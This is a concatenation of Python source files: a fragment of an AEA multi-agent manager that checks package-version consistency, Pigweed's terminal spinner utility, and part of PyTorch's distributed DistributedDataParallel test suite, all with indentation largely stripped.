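        # For example (hypothetical values), a conflict entry might look like:
        #   ((<component type>, "author", "some_skill"), "0.1.0", "0.2.0",
        #    {PublicId("author", "agent_a", "0.1.0")})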
conflicting_packages: List[Tuple[PackageIdPrefix, str, str, Set[PublicId]]] = []
for package_prefix in potentially_conflicting_packages:
existing_version, agents = self._package_id_prefix_to_version[
package_prefix
]
new_version = prefix_to_version[package_prefix]
if existing_version != new_version:
conflicting_packages.append(
(package_prefix, existing_version, new_version, agents)
)
if len(conflicting_packages) == 0:
return
raise ProjectPackageConsistencyCheckError(
agent_config.public_id, conflicting_packages
)
def _add_new_package_versions(self, agent_config: AgentConfig) -> None:
"""
Add new package versions.
This method is called whenever a project agent is added.
        It updates an internal data structure that is used to check
        for inconsistencies of AEA package versions across projects.
In particular, all the AEA packages with the same "prefix" must
be of the same version.
:param agent_config: the agent configuration.
"""
for component_id in agent_config.package_dependencies:
if component_id.component_prefix not in self._package_id_prefix_to_version:
self._package_id_prefix_to_version[component_id.component_prefix] = (
component_id.version,
set(),
)
version, agents = self._package_id_prefix_to_version[
component_id.component_prefix
]
enforce(
version == component_id.version,
f"internal consistency error: expected version '{version}', found {component_id.version}",
)
agents.add(agent_config.public_id)
def _remove_package_versions(self, agent_config: AgentConfig) -> None:
"""
Remove package versions.
This method is called whenever a project agent is removed.
        It updates an internal data structure that is used to check
        for inconsistencies of AEA package versions across projects.
In particular, all the AEA packages with the same "prefix" must
be of the same version.
:param agent_config: the agent configuration.
"""
package_prefix_to_remove = set()
for (
package_prefix,
(_version, agents),
) in self._package_id_prefix_to_version.items():
if agent_config.public_id in agents:
agents.remove(agent_config.public_id)
if len(agents) == 0:
package_prefix_to_remove.add(package_prefix)
for package_prefix in package_prefix_to_remove:
self._package_id_prefix_to_version.pop(package_prefix)
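# ------------------------------------------------------------------------------
# Usage sketch (illustrative only): a typical MultiAgentManager workflow. The
# project public id, agent name and working directory below are hypothetical
# and would need to exist in your local or remote registry. MultiAgentManager
# is typically imported from aea.manager.
#
#     from aea.configurations.data_types import PublicId
#     from aea.manager import MultiAgentManager
#
#     manager = MultiAgentManager(working_dir="./mam", mode="async")
#     manager.start_manager()
#     project_id = PublicId.from_str("author/some_agent:0.1.0")
#     manager.add_project(project_id)
#     manager.add_agent(project_id, agent_name="agent_1")
#     manager.start_agent("agent_1")
#     ...
#     manager.stop_manager()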
spinner.py
# Copyright 2020 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Spinner!"""
import contextlib
import sys
import threading
import time
class Spinner(object): # pylint: disable=useless-object-inheritance
"""Spinner!"""
def __init__(self, *args, **kwargs):
super(Spinner, self).__init__(*args, **kwargs)
self._done = None
self._thread = None
def __del__(self):
self._done = True
def _spin(self):
i = 0
chars = '|/-\\'
while not self._done:
sys.stdout.write('[{}]'.format(chars[i]))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\b\b\b')
i = (i + 1) % len(chars)
def start(self):
self._done = False
self._thread = threading.Thread(target=self._spin)
self._thread.start()
def stop(self):
assert self._thread
self._done = True
self._thread.join()
self._thread = None
@contextlib.contextmanager
def __call__(self):
try:
self.start()
yield self
finally:
self.stop()
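# Usage sketch (not part of the original module): Spinner.__call__ is a
# context manager, so a Spinner instance is typically used with `with`.
# The 2-second sleep below simply stands in for a long-running operation.
if __name__ == "__main__":
    spinner = Spinner()
    with spinner():
        # The spinner animates on stdout while this block runs.
        time.sleep(2)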
test_c10d_common.py
# Owner(s): ["oncall: distributed"]
import copy
import os
import sys
import tempfile
import threading
import time
from datetime import timedelta
from itertools import product
from sys import platform
from contextlib import suppress
import torch
import torch.distributed as dist
if not dist.is_available():
print("distributed package not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed.distributed_c10d as c10d
from torch.utils.checkpoint import checkpoint
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
skip_if_lt_x_gpu,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
TEST_WITH_DEV_DBG_ASAN,
instantiate_parametrized_tests,
parametrize
)
if TEST_WITH_DEV_DBG_ASAN:
print("Multiprocessing spawn is not compatible with dev/dbg asan", file=sys.stderr)
sys.exit(0)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
torch.backends.cuda.matmul.allow_tf32 = False
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
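# Worked example (hypothetical device count): with 8 visible GPUs and
# world_size=2, gpus_per_process is 8 // 2 = 4, so gpus_for_rank(2) returns
# [[0, 1, 2, 3], [4, 5, 6, 7]]: rank 0 uses the first subset, rank 1 the second.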
class AbstractTimeoutTest(object):
def _test_store_timeout(self, backend, init_method, c2p):
try:
dist.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
dist.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
class CommonDistributedDataParallelTest(object):
def tearDown(self):
# DistributedDataParallel test doesn't seem to call FileStore destructor
        # TODO: investigate this; the test is known to have issues.
# Use this hack to remove files for that test
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _get_store(self):
return dist.FileStore(self.file_name, self.world_size)
def _get_process_group(self):
raise NotImplementedError("To be implemented by child class")
def _train_model(self, model, input_var, target, loss, run_checkpoint=False, use_reentrant=True):
model.train()
if run_checkpoint:
output = checkpoint(model, input_var, use_reentrant=use_reentrant)
else:
output = model(input_var)
l = loss(output, target)
l.backward()
def _test_ddp_checkpointing(
self,
input_model,
process_group,
use_bucket_view,
find_unused_parameters=False,
static_graph=False,
run_checkpoint=False,
use_reentrant=True,
allow_none_grads=False,
):
# to reproduce the same training results
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
model = copy.deepcopy(input_model).cuda()
ddp_model = copy.deepcopy(input_model).cuda()
ddp_model = nn.parallel.DistributedDataParallel(
ddp_model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
static_graph=static_graph,
)
self.assertEqual(
ddp_model._get_ddp_logging_data().get("static_graph", 0), static_graph
)
input, ddp_input, target, ddp_target = self._prepare_dummy_data()
loss = nn.MSELoss()
n_iters = 5
for i in range(n_iters):
model.zero_grad(set_to_none=False)
ddp_model.zero_grad(set_to_none=False)
self._train_model(model, input, target, loss, run_checkpoint=run_checkpoint, use_reentrant=use_reentrant)
self._train_model(
ddp_model, ddp_input, ddp_target, loss, run_checkpoint=run_checkpoint, use_reentrant=use_reentrant
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
if not allow_none_grads:
self.assertTrue(i.grad is not None)
self.assertTrue(j.grad is not None)
self.assertEqual(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are referred to
# https://github.com/facebookresearch/fairscale/blob/main/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
"""
Runs checkpoint for a single layer in the model.
"""
def __init__(self, use_reentrant=True):
super().__init__()
self.l1 = nn.Linear(20, 20)
self.l2 = nn.Linear(20, 20)
self.use_reentrant = use_reentrant
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x, use_reentrant=self.use_reentrant)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
"""
Runs checkpoint for the same layer twice in a model. This simulates use
cases such as pipeline parallel where the same layer can be checkpointed
more than one time.
"""
def __init__(self, use_reentrant=True):
super().__init__(use_reentrant=use_reentrant)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x, use_reentrant=self.use_reentrant)
x = checkpoint(self.l2, x, use_reentrant=self.use_reentrant)
return x
class CheckpointTwiceModuleWeightSharing(CheckpointTwiceModule):
"""
Similar to CheckpointTwiceModule but the weights are shared.
"""
def __init__(self, use_reentrant=True):
super().__init__(use_reentrant=use_reentrant)
# Share weights
self.l1.weight = self.l2.weight
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x, use_reentrant=self.use_reentrant)
x = checkpoint(self.l2, x, use_reentrant=self.use_reentrant)
return x
class DynamicCheckpointTwiceModule(CheckpointTwiceModule):
def __init__(self, use_reentrant=True):
super().__init__(use_reentrant=use_reentrant)
self.count = 0
def forward(self, inp):
if self.count % 2:
x = checkpoint(self.l1, inp, use_reentrant=self.use_reentrant)
else:
x = checkpoint(self.l2, inp, use_reentrant=self.use_reentrant)
self.count += 1
return x
class DynamicCheckpointTwiceModuleWeightSharing(DynamicCheckpointTwiceModule):
def __init__(self, use_reentrant=True):
super().__init__(use_reentrant=use_reentrant)
# Share weights
self.l1.weight = self.l2.weight
def _prepare_dummy_data(self):
ddp_bs = 16
bs = ddp_bs * self.world_size
input = torch.rand((bs, 20), device="cuda", requires_grad=True)
target = torch.randn((bs, 20), device="cuda")
offset = self.rank * ddp_bs
ddp_input = input[offset : offset + ddp_bs]
ddp_target = target[offset : offset + ddp_bs]
return input, ddp_input, target, ddp_target
@skip_if_lt_x_gpu(2)
@parametrize("use_reentrant", [True, False])
def test_ddp_checkpointing_once(self, use_reentrant):
"""
DDP works as expected when layer is checkpointed only once.
"""
process_group = self._get_process_group()
for use_bucket_view, static_graph in product((False, True), (False, True)):
self._test_ddp_checkpointing(
self.CheckpointOnceModule(use_reentrant=use_reentrant),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
)
if static_graph:
# find_unused_parameters does not make a difference, since it is
# ignored for static graph.
self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
find_unused_parameters=True,
)
@skip_if_lt_x_gpu(2)
@parametrize("use_reentrant", [True, False])
def test_ddp_checkpointing_unused_params(self, use_reentrant):
"""
With reentrant autograd checkpointing impl, DDP will fail when there are
unused params in the model and no static graph training. With
non-reentrant checkpointing implementation, this works as expected.
"""
process_group = self._get_process_group()
for use_bucket_view in (True, False):
err_ctx = (
suppress() if not use_reentrant else
self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once."
)
)
with err_ctx:
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(use_reentrant=use_reentrant),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
)
# test passes when static_graph is true
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(use_reentrant=use_reentrant),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=True,
)
@skip_if_lt_x_gpu(2)
@parametrize("use_reentrant", [True, False])
def test_ddp_checkpointing_twice(self, use_reentrant):
"""
        Checkpointing twice fails for non-static graph with reentrant checkpoint
implementation, succeeds with non-reentrant checkpoint implementation.
"""
process_group = self._get_process_group()
for use_bucket_view in (True, False):
err_ctx = (
suppress() if not use_reentrant else
self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once."
)
)
with err_ctx:
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(use_reentrant=use_reentrant),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
)
with err_ctx:
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(use_reentrant=use_reentrant),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
find_unused_parameters=True,
)
@skip_if_lt_x_gpu(2)
@parametrize("use_reentrant", [True, False])
def test_ddp_checkpointing_twice_static_graph(self, use_reentrant):
"""
Regardless of reentrant or non-reentrant checkpointing impl,
checkpointing twice works with static graph enabled.
"""
process_group = self._get_process_group()
for use_bucket_view in (True, False):
# Test passes when static_graph=True.
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(use_reentrant=use_reentrant),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=True,
)
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_dynamic_module(self):
"""
        Dynamic module can be checkpointed multiple times with the non-reentrant
checkpointing implementation.
"""
process_group = self._get_process_group()
for use_bucket_view in (True, False):
model = self._test_ddp_checkpointing(
self.DynamicCheckpointTwiceModule(use_reentrant=False),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
find_unused_parameters=True,
# Grads can be none sometimes due to dynamic module not using
# all params.
allow_none_grads=True
)
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_dynamic_weight_sharing(self):
"""
Dynamic module can be checkpointed multiple times with weight sharing
using non-reentrant checkpointing implementation.
"""
process_group = self._get_process_group()
for use_bucket_view in (True, False):
model = self._test_ddp_checkpointing(
self.DynamicCheckpointTwiceModuleWeightSharing(use_reentrant=False),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
find_unused_parameters=True,
# Grads can be none sometimes due to dynamic module not using
# all params.
allow_none_grads=True
)
# DDP works as expected if there is weight sharing among layers
@skip_if_lt_x_gpu(2)
@parametrize("use_reentrant", [True, False])
def test_ddp_checkpointing_weight_sharing(self, use_reentrant):
"""
Test that checkpointing with weight sharing works.
"""
process_group = self._get_process_group()
torch.cuda.set_device(self.rank)
for use_bucket_view, static_graph in product((False, True), (False, True)):
torch.manual_seed(31415)
l1 = nn.Linear(20, 20)
l2 = nn.Linear(20, 20)
l1.weight = l2.weight
model = nn.Sequential(l1, l2)
# TODO: non-reentrant based checkpointing of DDP module with
# static_graph runs into the below issue, see
# https://github.com/pytorch/pytorch/issues/70865 and
# https://github.com/pytorch/pytorch/issues/58111 for details.
err_ctx = (
self.assertRaisesRegex(
RuntimeError,
"Your training graph has changed in this iteration"
) if static_graph and not use_reentrant else suppress()
)
with err_ctx:
self._test_ddp_checkpointing(
model,
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
run_checkpoint=True,
use_reentrant=use_reentrant,
)
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice_weight_sharing(self):
"""
        Checkpointing should work with static graph in the case of checkpointing
        the same layer twice and having weights shared across layers.
"""
process_group = self._get_process_group()
torch.cuda.set_device(self.rank)
for use_bucket_view in (True, False):
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModuleWeightSharing(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=True,
)
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
        must always be specified as a list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertTrue(ddp_logging_data.get("is_multi_device_module"))
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertFalse(ddp_logging_data.get("is_multi_device_module"))
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
            # DDP training, DDP scatters subsets of input to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
        for p in model.parameters():
            self.assertEqual(p.grad, expected_grad)
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
fut = torch.futures.Future()
fut.set_result(torch.ones_like(bucket.buffer()))
def fut_then(fut):
# Add ones to fut's result.
t = fut.value()
return t + torch.ones_like(t)
return fut.then(fut_then)
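# Illustrative note (not part of the test suite): a hook with the signature of
# `_simple_hook` above is attached to a DDP model via `register_comm_hook`, as
# done in `_gpu_model_with_ddp_comm_hook`, e.g.
#   gpu_model.register_comm_hook(state=None, hook=self._simple_hook)
# DDP calls the hook once per gradient bucket and uses the tensor wrapped in
# the returned Future as that bucket's reduced gradient, so `_simple_hook`
# turns every gradient into 2 * torch.ones_like(grad).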
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [40, 80]
)
self.assertEqual(per_bucket_size_limits, [40, 80, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [200, 400]
)
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
self.assertEqual(per_bucket_size_limits, [200, 200, 400, 400])
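# Informal reading of the expectations above (not a spec of the C++ bucketing
# logic): tensors are grouped per dtype in order, and the size limits are
# consumed as buckets fill up, with the last limit reused once the list is
# exhausted. With limits [200, 400] the float tensors therefore split into [0]
# and then [2, 4], and the double tensors into [1] and then [3, 5].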
class AbstractCommTest(object):
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _verify_sequence_number_across_pg(self, pg, verify_pg):
seq_num = pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
# We use a separate pg to verify the sequence numbers, otherwise these
# collectives will themselves increment the sequence number.
dist.all_gather_object(obj_list, seq_num, group=verify_pg)
self.assertEqual(len(set(obj_list)), 1)
return obj_list[0]
def _test_sequence_num_incremented(self, process_group, ranks):
# verify initial sequence numbers. Use a distinct process group for
# verification to keep counts as expected with respect to process_group.
verify_pg = dist.new_group(
ranks=ranks,
backend="gloo",
)
assert dist.get_world_size(process_group) == dist.get_world_size(verify_pg)
initial_num = (
self._verify_sequence_number_across_pg(
pg=process_group, verify_pg=verify_pg
)
if not c10d._rank_not_in_group(process_group)
else -1
)
# Verify sequence numbers are appropriately incremented
for i in range(10):
t = torch.ones(1, device=torch.cuda.current_device())
dist.all_reduce(t, group=process_group)
if not c10d._rank_not_in_group(process_group):
seq_num = self._verify_sequence_number_across_pg(
pg=process_group,
verify_pg=verify_pg,
)
self.assertEqual(initial_num + i + 1, seq_num)
if dist.get_world_size(process_group) > 2:
# Test when certain ranks don't call collectives
if dist.get_rank(process_group) not in [0, 2]:
dist.all_reduce(t, group=process_group, async_op=True)
# Now ranks 0 and 2 should be lagging by 1.
if not c10d._rank_not_in_group(process_group):
seq_num = process_group._get_sequence_number_for_group()
rank = dist.get_rank(process_group)
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
dist.all_gather_object(obj_list, (rank, seq_num), group=verify_pg)
rank_to_seq_num = {rank: num for (rank, num) in obj_list}
self.assertEqual(len(set(rank_to_seq_num.values())), 2)
self.assertEqual(rank_to_seq_num[0], rank_to_seq_num[2])
expected_same = {
rank_to_seq_num[i]
for i in rank_to_seq_num.keys()
if i not in [0, 2]
}
self.assertEqual(len(expected_same), 1)
self.assertEqual(rank_to_seq_num[0] + 1, rank_to_seq_num[1])
def _test_sequence_num_incremented_default_group(self, backend_name):
torch.cuda.set_device(self.rank)
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
self._test_sequence_num_incremented(
c10d._get_default_group(),
ranks=list(i for i in range(dist.get_world_size())),
)
def _test_sequence_num_incremented_subgroup(self, backend_name):
torch.cuda.set_device(self.rank)
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup_ranks = [0, 1, 2]
subgroup = dist.new_group(subgroup_ranks)
self._test_sequence_num_incremented(subgroup, subgroup_ranks)
